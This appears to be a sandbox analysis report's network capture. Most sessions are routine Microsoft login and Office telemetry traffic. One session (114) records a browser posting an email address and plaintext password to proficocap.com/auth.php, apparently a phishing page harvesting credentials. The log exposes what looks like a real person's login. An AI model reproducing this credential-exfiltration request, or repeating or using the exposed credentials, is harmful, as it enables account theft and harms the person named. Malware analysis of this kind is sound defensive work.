                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          110192.168.2.44987420.190.147.8443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:33 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/soap+xml
                                                                          Accept: */*
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                          Content-Length: 4831
                                                                          Host: login.live.com
                                                                          2024-12-08 19:51:33 UTC4831OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                          2024-12-08 19:51:33 UTC569INHTTP/1.1 200 OK
                                                                          Cache-Control: no-store, no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                          Expires: Sun, 08 Dec 2024 19:50:33 GMT
                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                          x-ms-route-info: C510_BAY
                                                                          x-ms-request-id: f130f858-efbb-4ee8-8fce-46512cf793e2
                                                                          PPServer: PPV: 30 H: PH1PEPF0001B786 V: 0
                                                                          X-Content-Type-Options: nosniff
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          X-XSS-Protection: 1; mode=block
                                                                          Date: Sun, 08 Dec 2024 19:51:33 GMT
                                                                          Connection: close
                                                                          Content-Length: 11197
                                                                          2024-12-08 19:51:33 UTC11197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          111192.168.2.44987320.190.147.8443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:33 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/soap+xml
                                                                          Accept: */*
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                          Content-Length: 4831
                                                                          Host: login.live.com
                                                                          2024-12-08 19:51:33 UTC4831OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                          2024-12-08 19:51:33 UTC569INHTTP/1.1 200 OK
                                                                          Cache-Control: no-store, no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                          Expires: Sun, 08 Dec 2024 19:50:33 GMT
                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                          x-ms-route-info: C510_SN1
                                                                          x-ms-request-id: f730841e-1c58-4cc9-8271-3ef845bc1d05
                                                                          PPServer: PPV: 30 H: SN1PEPF0002F08C V: 0
                                                                          X-Content-Type-Options: nosniff
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          X-XSS-Protection: 1; mode=block
                                                                          Date: Sun, 08 Dec 2024 19:51:33 GMT
                                                                          Connection: close
                                                                          Content-Length: 11197
                                                                          2024-12-08 19:51:33 UTC11197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          112192.168.2.44987520.190.147.8443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:33 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/soap+xml
                                                                          Accept: */*
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                          Content-Length: 4831
                                                                          Host: login.live.com
                                                                          2024-12-08 19:51:33 UTC4831OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                          2024-12-08 19:51:33 UTC569INHTTP/1.1 200 OK
                                                                          Cache-Control: no-store, no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                          Expires: Sun, 08 Dec 2024 19:50:33 GMT
                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                          x-ms-route-info: C510_BAY
                                                                          x-ms-request-id: cd50685e-5208-4355-a731-dd6d353093e7
                                                                          PPServer: PPV: 30 H: PH1PEPF0001B78B V: 0
                                                                          X-Content-Type-Options: nosniff
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          X-XSS-Protection: 1; mode=block
                                                                          Date: Sun, 08 Dec 2024 19:51:32 GMT
                                                                          Connection: close
                                                                          Content-Length: 11197
                                                                          2024-12-08 19:51:33 UTC11197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          113192.168.2.44987713.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:33 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:33 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:33 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 475
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                          ETag: "0x8DC582BB2BE84FD"
                                                                          x-ms-request-id: 2968f52d-d01e-002b-1502-4825fb000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195133Z-r1cf579d778qgtz2hC1EWRmgks000000066g000000000cu6
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:33 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          114192.168.2.449881104.21.53.1714431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:33 UTC1425OUTPOST /auth.php HTTP/1.1
                                                                          Host: proficocap.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 77
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-arch: "x86"
                                                                          sec-ch-ua-full-version: "117.0.5938.132"
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                          sec-ch-ua-bitness: "64"
                                                                          sec-ch-ua-model: ""
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://proficocap.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://proficocap.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: cf_clearance=o_FJwQFAkyKFmUfmCGrp5TpCszyZBTMGgkbbHcC0MJY-1733687428-1.2.1.1-E0tdvG5qU6joew2YeI5KK3iuI971.BRkINBn1h9fKLqaKXgnQY7PV.z5AdfIosOC8UgRmCdnMP1owNKw5BbcgrQAlonghYLs66L2eOJ2lE8IiN_r_uFDjBjx4mw6UI4.oZDtesnuw019pqf.R50Z1TMVUw8rXYe7mXWU6DBaygKSDboZ4p4MDm1BYhaGzSGAgnJvWpUh4mn8pie3rGayBXdqnGegbf0yBPIYQla7Y6fc.Xc2JQPf0DKQuaXG4QGoybz85baQwEWK7KEgkvPcJ2ys6WT4XUnUm0PuWVeGUcqmbzssMuL5QK2hmdJ_AzzeHfsLmzVhKXczhqymP5Kkj5pvIvS68vmv3bGYbyu92ZRlW08FaHQuhM8nLtNFE5qtaV0mmzz9APdPYjE5N3I3hltM0Hx5tc37pmGYorhZWRqyH9N2Y6yf3FHD0DVcV79d
                                                                          2024-12-08 19:51:33 UTC77OUTData Raw: 75 73 65 72 6e 61 6d 65 3d 67 72 61 6e 74 2e 72 61 6d 73 64 65 6e 25 34 30 76 69 72 67 69 6e 6d 6f 6e 65 79 2e 63 6f 6d 26 70 61 73 73 77 6f 72 64 3d 25 32 34 73 42 48 25 32 33 4d 30 7a 32 25 32 34 62 47 57 59 4e 25 32 42 25 34 30
                                                                          Data Ascii: username=grant.ramsden%40virginmoney.com&password=%24sBH%23M0z2%24bGWYN%2B%40
                                                                          2024-12-08 19:51:34 UTC844INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:34 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: ASP.NET
                                                                          X-Powered-By-Plesk: PleskWin
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gscQ9aJ9AN7ZeoEjWzhmGU2pXfIf0ZN4FBSWbOPREnHhl2PU%2B%2BCv8sbY5gjVuqsEnIuqfsHAGrly0DFDS3R5i1zAd4b4QnBFrAAtrnb9tMrw5cx%2BNodB1FBquK2XaiIwXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef4a7298d341e9-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2078&min_rtt=2043&rtt_var=791&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2102&delivery_rate=1429270&cwnd=248&unsent_bytes=0&cid=555f37f6f0dfe8a6&ts=1340&x=0"
                                                                          2024-12-08 19:51:34 UTC22INData Raw: 31 30 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 7d 0d 0a
                                                                          Data Ascii: 10{"success":true}
                                                                          2024-12-08 19:51:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          115192.168.2.44987813.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:33 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:33 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:33 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 448
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                          ETag: "0x8DC582BB389F49B"
                                                                          x-ms-request-id: 072142d6-401e-0029-0802-489b43000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195133Z-r1cf579d778v97q7hC1EWRf95c00000005v00000000082rt
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:33 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          116192.168.2.44988013.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:33 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:34 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:33 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 416
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                          ETag: "0x8DC582BAEA4B445"
                                                                          x-ms-request-id: 35b89458-f01e-0099-4644-499171000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195133Z-r1cf579d778v97q7hC1EWRf95c00000005xg0000000044pk
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:34 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          117192.168.2.44987913.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:33 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:34 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:33 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 491
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                          ETag: "0x8DC582B98B88612"
                                                                          x-ms-request-id: 7ea70f1c-301e-005d-1d26-49e448000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195133Z-r1cf579d7789jf56hC1EWRu58800000001fg000000001t1s
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:34 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
